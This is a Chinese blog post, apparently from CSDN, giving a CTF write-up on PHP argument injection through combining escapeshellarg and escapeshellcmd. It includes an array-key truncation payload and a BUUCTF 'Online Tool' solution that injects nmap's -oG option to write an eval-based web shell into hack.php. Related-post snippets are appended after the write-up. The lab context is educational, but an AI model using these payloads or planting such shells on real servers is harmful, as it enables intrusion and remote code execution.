php 转义md5 和java 转译的区别_CTF|PHP中的命令参数注入

最新推荐文章于 2023-10-24 15:00:51 发布
最新推荐文章于 2023-10-24 15:00:51 发布
阅读量229 收藏
点赞数
文章标签: php 转义md5 和java 转译的区别
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39592240/article/details/111653578
版权

f69f03863b6cb5746ed26f65ef543ef9.png

直奔主题,首先来了解两个 PHP 函数的定义。

命令参数注入

escapeshellarg

把字符串转码为可以在 shell 命令里使用的参数。

escapeshellcmd

对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。

看上去似乎没什么毛病,escapeshellarg 与 escapeshellcmd 两个函数都是 php 设置来转义非法字符的,不过由于它们俩的转义规则有所不同,当先使用 escapeshellarg 再使用 escapeshellcmd 时,就可能导致命令参数注入。这是为什么呢?

原理解析

f89308fbe23728d672b78b340231d8ab.png

test.php

fc32a58b0c31b2fd9ba91385e05c332c.png

执行的语句将变成

curl '127.0.0.1''' -v -d a=1'

相当于

curl 127.0.0.1 -v -d a=1'

从而实现参数注入

题目分析

下面就以几道 CTF 题作为补充的讲解。

题目1:[0 => 0] === [0x100000000 => 0]

<?php
$user = ['admin', 'xxoo'];
if(empty($_GET['user']))  die(show_souce(__FILE__));
if($_GET['user'] === $user && $_GET['user'][0] != 'admin'){
    echo $flag;
} else {
    die('sketch_pl4ne_wants_a_girlfriend.');
}
?>

分析

这个实际上考的是索引数组的整数键截断

也就是:https://bugs.php.net/bug.php?id=69892

59648b7ffa15bcf2e1868e19a6db3384.png 
var_dump([0 => 0] === [0x100000000 => 0]); // bool(true)

构造 payload

?user[4294967296]=admin&user[1]=xxoo
//0x100000000 == 4294967296
该漏洞仅在 64 位的 php 中有效
如何判断 32 位还是 64 位?
查看 phpinfo() 即可知道。

题目2:BUUCTF_2018_Online Tool

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

分析

直接代码审计吧,remote_addr 和 x_forwarded_for 这两个是服务器获取 ip 用的。

$host = escapeshellarg($host);
$host = escapeshellcmd($host);

前面说了,这两个 PHP 函数一起使用,会导致漏洞。

再后面 echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);

有个 system 来执行命令,而且有传参,这里应该就是突破口了。

nmap 可以做些什么呢?查阅相关资料后,发现一个 namp 参数 -oG 可以实现将命令和结果写到文件。

so,写入上传文件,直接一句话走起吧。

?host=' <?php @eval($_POST["hack"]);?> -oG hack.php '

执行后会返回文件夹名

85db0bc4bddc5f1d3e3f4fa6808099fa.png

连接一句话即可得到 flag。

参考: https:// bugs.php.net/bug.php? id=69892 https://www. php.net/manual/zh/funct ion.escapeshellcmd.php

二向箔安全的网络安全技能包又更新了!学 Python 的也能当黑客了,多实战沉浸式体验,让你回味无穷。

这个春节,让你从 程序猿→黑客x程序员 PLUS

f59edfa819d9b4aa50eba0f24ba7f679.png

更多有关渗透测试的内容请前往二向箔安全进行学习,最近推出了“挖洞”班,想了解更多资讯的,可咨询客服微信 twosecurity02

17d73366138ed90b1e9a81e4ccfda445.png
PHPGET方法参数传递空格+逗号等特殊字符处理办法
qvanminpiao的博客
08-15 3582
撸了今年阿里、头条和美团的面试,我有一个重要发现.......>>> ...
Java】URL 特殊字符转义 Java encode url 特殊字符转义
最新发布
wjianwei666的专栏
01-26 709
每一次改变#后的部分,都会在浏览器的访问历史增加一个记录,使用"后退"按钮,就可以回到上一个位置。比如,从http://www.example.com/index.html#location1改成http://www.example.com/index.html#location2,浏览器不会重新向服务器请求index.html。为什么要转义字符:如果你的表单使用get方法提交,并且提交的参数有“&”等特殊符的话,如果不做处理,在service端就会将&后面的作为另外一个参数来看待。
JS的MD5转义、时间戳与日期互换
12-02
JS的MD5转义、时间戳与日期互换JS的MD5转义、时间戳与日期互换JS的MD5转义、时间戳与日期互换JS的MD5转义、时间戳与日期互换JS的MD5转义、时间戳与日期互换
PHPmd5Javamd5加密结果不一致问题
weixin_30724853的博客
11-16 366
/** * 获取MD5加密后的字符串 * @param str 明文 * @return 加密后的字符串 * @throws Exception */ public static String getMD5(String str) throws Exception { /** 创建MD5加密对象 */ MessageDig...
phpmd5转换代码_PHPmd5()函数的用法讲解
weixin_33443333的博客
03-08 480
PHP md5() 函数实例计算字符串 "Hello" 的 MD5 散列:$str = "Hello";echo md5($str);?>定义和用法md5()函数计算字符串的 MD5 散列。md5()函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法: MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长...
PHP md5JAVA加密后的值不一致,php封装md5处理
qqwawa123的博客
08-18 439
function md5($key){ return unpack("c*", md5($key,true)); }
南邮CTF-WEB-write-up 教程详细解说
残阳泼茶香的博客
03-20 3513
单身一百年也没用 Download~! COOKIE MYSQL sql injection 3 /x00 bypass again 变量覆盖 PHP是世界上最好的语言 伪装者 Header 上传绕过 SQL注入1 pass check 起名字真难 密码重置 php 反序列化 sql injection 4 综合题 system SQL注入2 综合题2 注入实战1 密码重置2 ...
浅谈SQL注入防御手段
0verWatch的博客
08-02 4867
sql语句预编译 例如: String sql = "select id, no from user where id=?"; PreparedStatement ps = conn.prepareStatement(sql); ps.setInt(1, id); ps.executeQuery(); 这里采用了PreparedStatement,就会...
[BUUCTF 2018]Online Tool
qq_42812036的博客
02-13 667
0x00知识点 nmap -oG 命令写入文件 参数注入 漏洞产生原因: 使用escapeshellcmd / escapeshellarg时不可能执行第二个命令。 但是我们仍然可以将参数传递给第一个命令。 这意味着我们也可以将新选项传递给命令。 利用漏洞的能力取决于目标可执行文件。 0x01:CTF remote_addr和x_forwarded_for这两个是见的比较多的,服务器...
md5 php 加密后乱码_解决PHPMD5加密与JAVAMD5加密不一致
weixin_33736210的博客
01-17 513
最新在做一个项目,用到了很久没写过的android,并且需要对其进行加密结果发现两边结果(PHP以及android)怎么样加密后的都不一样,自己便上网搜了一下便知道原因了因为编码的问题,需要对android端进行编码转换接下来就贴一下android端正确的MD5加密代码public static String md5(byte[] source) {try{MessageDigest md = M...
MD5转化
xinychan的博客
02-18 2095
把一个普通字符串转成MD5格式的字符串
MD5转义 和 调用http
weixin_48229232的博客
10-24 100
使用::::::::::::::::::转换md5
Python脚本——MD5碰撞和HTML转义
Forever_Han13的博客
02-22 818
import hashlib for i in range(1,100000000000): s = hashlib.md5(str(i).encode("utf-8")).hexdigest()[0:6] if s == "184b43": print(i) break in_str = "(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=3MGcX
md5配合Base64及转义字符处理办法
weixin_42547014的博客
03-11 842
import java.security.MessageDigest; import java.util.Base64; public String md5(String input) { try { MessageDigest md5 = MessageDigest.getInstance("MD5"); md5.update(input.getBytes()); byte[] byteArray = md5.digest(); String result = Base64.
MD5 编码 转换
技术博客
04-06 4669
<br /> <br />编码MD5转换相关问题!<br /> public static void main(String[] args) throws UnsupportedEncodingException { // String s = "·编码·.abc1"; String s = "abc1";// 编码全相同 // String s = "·";// 特殊字符,编码全不相同 // String s = "编码"; // GB2312 GBK 相同,UTF8(UTF-8)不相同
JAVA 安全性转码代码(包括sql注入,跨站脚本)
Java程序员专栏
11-11 5265
public class SecurityString { public static String getHtml(String str) { //过滤敏感字符 str = filter(str); if (str != null) { return str.replaceAll("\r\n", "");
MD5加密和转码
流风雨情的博客
06-08 6653
MD5:   在上一篇《Servlet的学习之Session(5)》,为了能使获取的所有随机数都能有相同的位数,我们采用MD5获取随机数的消息摘要(或称数据指纹、数据摘要等等)。   MD5可以将所有的数字组合进行一个算法的运算得出一个新的数字组合,并且这个新的数字组合都是128位,也称为MD5码。MD5码是不可逆的,即无法通过MD5码来进行反向运算得到原始的数据。MD5的应用场合非常多,比
phppreg_match函数的转义字符匹配问题($)
weixin_51439723的博客
08-12 1213
ctf命令执行的时候发现php的preg_match函数正则转义符号规则和在线网站(ex:regex101.com)有点不一样
PHP命令注入攻击详解:风险与防范
在实验环境,通过注入`|`或`&`这样的管道符和逻辑运算符,攻击者可以改变命令执行的流程。例如,`|`在Windows用于将前一个命令的输出作为后一个命令的输入,而`&`则让两个命令并行执行。在示例,通过设置`ip=...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值